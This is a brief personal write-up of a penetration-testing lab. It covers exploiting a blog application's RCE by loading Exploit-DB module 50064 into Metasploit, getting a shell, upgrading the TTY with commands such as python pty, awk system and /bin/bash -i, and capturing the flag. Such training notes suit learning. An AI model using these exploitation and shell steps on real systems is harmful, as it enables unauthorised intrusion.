# Recon - visit blog.inlanefreight.local - name: slade wilson - blog post re: lightweight facebook-styled blog 1.3 RCE - https://www.exploit-db.com/exploits/50064 - foothold machine has an `access-creds.txt` file on Desktop ![[images/Pasted image 20251003102537.png]] # Exploit - copy + paste 50064.rb into a new file with nano - `sudo cp 50064.rb /usr/share/metasploit-framework/modules/exploits/linux/http` mode exploit into MSF folder - after opening msfconsole attempt to use new exploit `use exploit/linux/http/500654` - set RHOST, RHOSTS, VHOST, USERNAME, PASSWORD ![[images/Pasted image 20251003100042.png]] - and we have a shell ![[images/Pasted image 20251003100713.png]] - upgrade to interactive TTY session - `python -c 'import pty; pty.spawn("/bin/sh")'` - doesn't work bc python not found - `awk 'BEGIN {system("/bin/sh")}'` - doesn't work - `/bin/bash -i` - worked - we have the flag ![[images/Pasted image 20251003101326.png]] -